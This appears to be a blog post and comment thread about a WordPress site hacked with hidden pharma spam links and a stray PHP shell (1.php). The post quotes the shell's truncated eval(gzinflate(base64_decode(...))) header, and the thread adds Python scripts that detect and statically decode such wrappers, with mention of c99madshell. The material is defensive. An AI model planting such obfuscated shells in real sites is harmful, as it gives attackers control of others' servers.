My Blog Hacked for Spam

Fucking spammers. Today I found a mountain of spam links for crap like zyrtec and zithromax in my footers.php. All the links forward to canadian-meds-shop.com. These are bad people: scammers and thieves.

I also found a strange file in my wordpress theme file, 1.php. The file started like this:

<?PHP
//Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = ""; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs//

I don’t know how this file got there or what it does but I’m pretty sure it’s bad stuff.

Do you want to try and figure out what this evil f’ing spam program does? Here is the virus file. Caution! This is a bad program! (update: I removed the virus. It’s a bother that it keeps tripping my antivirus software.)

Tell me what you find out, would you?

Now I’ve got to figure out how they got on my system…. grrrrrr.
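The two things found here, a stray PHP file wrapped in eval(gzinflate(base64_decode(...))) and hidden pharma links dropped into a theme file, are easy to sweep for across a whole theme directory. The scanner below is an added example, not code from this post or from WordPress: it walks a web root, flags the eval-wrapper pattern and any anchor pointing at a listed spam domain, and builds its own constructed sample directory in a temp folder to run against. The domain blocklist and drug-name list are assumptions taken from the post, and the base64 string in the sample 1.php is a placeholder, not the real payload.

```python
import os
import re
import tempfile

# Indicators drawn from the post: eval() wrapped around a decoder/inflater,
# and hidden links to the pharma domain. Extend both lists for your own site.
OBFUSCATION_RE = re.compile(
    r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I)
SPAM_LINK_RE = re.compile(
    r"<a\b[^>]*href\s*=\s*[\"']https?://([^/\"']+)", re.I)
SPAM_DOMAINS = {"canadian-meds-shop.com"}   # assumption: the domain named in the post
SPAM_TERMS = ("zyrtec", "zithromax")        # assumption: the drug names named in the post


def scan_file(path):
    """Return a list of (indicator, detail) tuples found in one PHP file."""
    findings = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    m = OBFUSCATION_RE.search(text)
    if m:
        findings.append(("obfuscated-eval", m.group(0)))
    for m in SPAM_LINK_RE.finditer(text):
        host = m.group(1).lower()
        if host in SPAM_DOMAINS:
            findings.append(("spam-link", host))
    lowered = text.lower()
    for term in SPAM_TERMS:
        if term in lowered:
            findings.append(("spam-term", term))
    return findings


def scan_tree(root):
    """Walk a web root, scan every .php file, return {relative_path: findings}."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            findings = scan_file(path)
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


def build_sample_site():
    """Constructed sample: a clean header, a spammed footer and a stray 1.php shaped like the post's."""
    root = tempfile.mkdtemp(prefix="wp-theme-")
    with open(os.path.join(root, "header.php"), "w") as fh:
        fh.write('<?php get_header(); ?>\n<div id="page">\n')
    with open(os.path.join(root, "footer.php"), "w") as fh:
        fh.write('</div>\n<div style="display:none">'
                 '<a href="http://canadian-meds-shop.com/buy">zithromax</a></div>\n')
    with open(os.path.join(root, "1.php"), "w") as fh:
        # PLACEHOLDER stands in for the real base64 blob; it is not the post's payload.
        fh.write('<?php\n$login = "";\neval(gzinflate(base64_decode(\'PLACEHOLDER\')));\n')
    return root


if __name__ == "__main__":
    for rel, found in sorted(scan_tree(build_sample_site()).items()):
        print(rel, found)
```

Run it against a real theme directory by passing that path to scan_tree() instead of build_sample_site(); pair the output with file modification times, since a freshly dated file in an otherwise old theme is usually the one to look at first.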

10 Comments

  1. (also see Nicholas’ followup comment below – Lee)
    Base64 is a method of encryption/decryption.

The virus is actually a script that includes a “binary” executable in the form of text, using base64 encryption. The PHP code uses the eval method of calling the

    To evaluate what the program does, you must decrypt the code, saving into binary, then you must reverse engineer or run in a “safe thread” that can be evaluated for its purposes.

    The attack on your server was simple: use a web form provided on your site to feed garbage data until the server executes that data, saving a file into the web folder. Then, the attacker calls the program directly using the URL to the script… and if your server isn’t locked down just right, it will run.. injecting a binary into memory.. and they are in.

    Attackers tend to find security flaws in common free programs like blog scripts, then will find blogs on the web, then attack them.

  2. Most all blog hacks are from people not upgrading their blog software.

If you don’t make a ton of changes, just backup your template one time, then create or download a script to email you a database dump every couple days.

    Hacker Forums

  3. lee says:

    Hey Hacker Forums, my blog and all the plugins are fully up to date. but good try. :-(

    Thanks for the comment and SEO. I’m not so keen on the self-promotion so I edited your links.

  4. kk says:

    try to print out the source with something like

<?php echo gzinflate(base64_decode('HJ3…')); ?>
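Swapping eval for echo, as suggested above, does reveal the next layer, but it still means feeding the attacker's PHP to a PHP interpreter, and a payload is often several wrappers deep. The script below is an added example, not code from any commenter: it does the same unwrapping statically in Python, repeatedly matching eval(gzinflate(base64_decode('...'))) or the simpler eval(base64_decode('...')), base64-decoding and inflating the raw DEFLATE stream that PHP's gzinflate expects, until no wrapper is left. Nothing is executed. The sample it decodes is constructed in the script from a harmless echo statement; the real payload from the post is not included. Shells that add str_rot13 or strrev layers would need extra cases.

```python
import base64
import re
import zlib

# One obfuscation layer: eval(gzinflate(base64_decode('...'))) as in the post,
# or the lighter eval(base64_decode('...')). Group 1 is set when gzinflate is present.
WRAPPER_RE = re.compile(
    r"eval\s*\(\s*(gzinflate\s*\(\s*)?base64_decode\s*\(\s*"
    r"['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)?\s*\)",
    re.I)


def peel_layer(php_source):
    """Decode one wrapper statically; return the inner source, or None if none is found."""
    m = WRAPPER_RE.search(php_source)
    if m is None:
        return None
    raw = base64.b64decode(re.sub(r"\s+", "", m.group(2)))
    if m.group(1):
        # PHP's gzinflate() undoes a raw DEFLATE stream (no zlib/gzip header): wbits=-15
        raw = zlib.decompress(raw, -15)
    # latin-1 maps every byte to a code point, so binary junk in a layer never raises
    return raw.decode("latin-1")


def unwrap(php_source, max_layers=50):
    """Peel wrappers until plain source remains. Returns (source, number_of_layers)."""
    layers = 0
    while layers < max_layers:
        inner = peel_layer(php_source)
        if inner is None:
            break
        php_source = inner
        layers += 1
    return php_source, layers


def wrap_layer(php_source, compress):
    """Build a test fixture in the same shape as the post's file (constructed sample only)."""
    data = php_source.encode("latin-1")
    if compress:
        c = zlib.compressobj(level=9, wbits=-15)   # raw DEFLATE, what gzinflate() undoes
        data = c.compress(data) + c.flush()
    b64 = base64.b64encode(data).decode("ascii")
    call = f"base64_decode('{b64}')"
    if compress:
        call = f"gzinflate({call})"
    return f"<?php eval({call}); ?>"


# Constructed sample: a harmless echo, deflated+encoded, then encoded again (two layers).
INNER_SOURCE = '<?php echo "constructed harmless payload"; ?>'
SAMPLE = wrap_layer(wrap_layer(INNER_SOURCE, compress=True), compress=False)

if __name__ == "__main__":
    source, n = unwrap(SAMPLE)
    print(f"peeled {n} layer(s):")
    print(source)
```

To use it on a real file, read the file's contents and pass the string to unwrap(); the final source is what you then read for the login/password check, file manager, and command execution routines typical of this kind of shell.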

  5. patrick says:

    Hey Lee,

    Thanks for posting this. I found it by searching the first several characters of the base_64/gz hash. Same thing happened to me, just different file names. Nothing harmed other than the file placement. I have a joomla site.

    I am wondering if you found out how the file was placed.

    I only have http/error logs to go by, and I cannot determine the MO from it.

I have the IP of my offender, if you wish to compare notes, but I am more interested in the How than the Who right now.

    Thanks!

  6. lee says:

Patrick, I haven’t figured out how this file got there. All I’ve really done so far is change my WordPress password, and I haven’t gotten another attack. I wish I had a better answer. :-(

  7. 6 months later says:

    search c99madshell for more info

  8. lee says:

    >c99madshell

    Cool. Thanks for the pointer.

  9. I have made a mistake in the following previous post:

    Base64 is a method of encryption/decryption.

The virus is actually a script that includes a “binary” executable in the form of text, using base64 encryption. The PHP code uses the eval method of calling the

    To evaluate what the program does, you must decrypt the code, saving into binary, then you must reverse engineer or run in a “safe thread” that can be evaluated for its purposes.

    The attack on your server was simple: use a web form provided on your site to feed garbage data until the server executes that data, saving a file into the web folder. Then, the attacker calls the program directly using the URL to the script… and if your server isn’t locked down just right, it will run.. injecting a binary into memory.. and they are in.

    Attackers tend to find security flaws in common free programs like blog scripts, then will find blogs on the web, then attack them.

    —————–
The mistake is that base64 was an encryption/decryption protocol… it is not. It is actually a method of encoding and decoding data, both text and binary, so that it can be easily transferred between services such as client/server… and for things like storing images and other files in a SQL database… the possibilities are sort of endless… Sometimes I write without reviewing my statements, which is why I didn’t catch the encryption/decryption vs encoding/decoding.

  10. lee says:

    Hey Nicholas. Thanks for the update. I put a little note on your first comment above.
